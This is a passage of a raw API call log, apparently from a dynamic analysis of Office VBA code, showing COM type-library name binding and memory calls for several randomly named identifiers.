ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814aa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAcAUwx") returned 8 [0069.632] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EAcAUwx", lHashVal=0x101484, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.632] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAcAUwx") returned 0x101484 [0069.632] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="EAcAUwx" | out: _Dst="EAcAUwx") returned 0x0 [0069.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="EAcAUwx") returned 8 [0069.632] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.632] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EAcAUwx", lHashVal=0x101484, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.632] IUnknown:Release (This=0x665ba50) returned 0xd [0069.632] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.632] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EAcAUwx", lHashVal=0x101484, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.632] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.633] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.633] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EAcAUwx", lHashVal=0x101484, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.633] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.633] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.633] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EAcAUwx", lHashVal=0x101484, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.633] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814aa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="EAcAUwx") returned 8 [0069.633] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EAcAUwx", lHashVal=0x101484, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.633] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.633] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b814aa | out: _Dst=0x67c2d40) returned 0x0 [0069.633] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EAcAUwx") returned 0x101808 [0069.633] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_EAcAUwx" | out: _Dst="_B_var_EAcAUwx") returned 0x0 [0069.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_EAcAUwx") returned 15 [0069.633] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.633] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EAcAUwx", lHashVal=0x101808, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.633] IUnknown:Release (This=0x665ba50) returned 0xd [0069.633] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.633] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EAcAUwx", lHashVal=0x101808, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.633] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.633] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.633] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EAcAUwx", lHashVal=0x101808, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.633] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.633] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.633] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EAcAUwx", lHashVal=0x101808, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.633] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.633] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.633] IUnknown:Release (This=0x665ba50) returned 0xd [0069.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8706ae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_EAcAUwx") returned 15 [0069.634] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EAcAUwx", lHashVal=0x101808, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0069.634] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b814aa | out: _Dst=0x144ec0) returned 0x0 [0069.634] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MCZAAAx", lHashVal=0x10deaf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MCZAAAx") returned 8 [0069.634] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MCZAAAx", lHashVal=0x10deaf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MCZAAAx") returned 8 [0069.634] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MCZAAAx", lHashVal=0x10deaf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.634] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MCZAAAx") returned 0x10deaf [0069.634] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="MCZAAAx" | out: _Dst="MCZAAAx") returned 0x0 [0069.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="MCZAAAx") returned 8 [0069.634] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.634] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MCZAAAx", lHashVal=0x10deaf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.634] IUnknown:Release (This=0x665ba50) returned 0xd [0069.634] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.634] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MCZAAAx", lHashVal=0x10deaf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.634] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.634] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.634] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MCZAAAx", lHashVal=0x10deaf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.634] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.634] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.634] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MCZAAAx", lHashVal=0x10deaf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.634] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MCZAAAx") returned 8 [0069.635] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MCZAAAx", lHashVal=0x10deaf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.635] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.635] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b814d2 | out: _Dst=0x67c2d40) returned 0x0 [0069.635] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MCZAAAx") returned 0x10e233 [0069.635] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_MCZAAAx" | out: _Dst="_B_var_MCZAAAx") returned 0x0 [0069.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_MCZAAAx") returned 15 [0069.635] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.635] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MCZAAAx", lHashVal=0x10e233, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.635] IUnknown:Release (This=0x665ba50) returned 0xd [0069.635] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.635] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MCZAAAx", lHashVal=0x10e233, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.635] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.635] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.635] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MCZAAAx", lHashVal=0x10e233, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.635] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.635] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.635] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MCZAAAx", lHashVal=0x10e233, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.635] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.635] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.635] IUnknown:Release (This=0x665ba50) returned 0xd [0069.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8706de, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_MCZAAAx") returned 15 [0069.635] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MCZAAAx", lHashVal=0x10e233, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.635] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b814d2 | out: _Dst=0x144ec0) returned 0x0 [0069.635] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.635] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.636] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.636] IUnknown:Release (This=0x665ba50) returned 0xd [0069.636] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.636] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.636] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.636] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.636] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.636] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.636] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.636] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.636] IUnknown:Release (This=0x665ba50) returned 0xd [0069.636] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.636] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.636] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.636] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.636] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.636] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.636] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.636] IUnknown:Release (This=0x665ba50) returned 0xd [0069.636] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.636] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.636] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.636] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.636] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.637] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.637] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.637] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.637] IUnknown:Release (This=0x665ba50) returned 0xd [0069.637] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.637] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.637] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.637] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.637] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.637] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.637] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.637] IUnknown:Release (This=0x665ba50) returned 0xd [0069.637] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.637] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.637] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.637] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.637] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.637] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.637] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.637] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.637] IUnknown:Release (This=0x665ba50) returned 0xd [0069.637] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.638] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.638] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.638] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.638] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.638] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.638] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.638] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.638] IUnknown:Release (This=0x665ba50) returned 0xd [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.638] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.638] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.638] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.638] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.638] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.638] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.638] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.638] IUnknown:Release (This=0x665ba50) returned 0xd [0069.638] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.639] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.639] 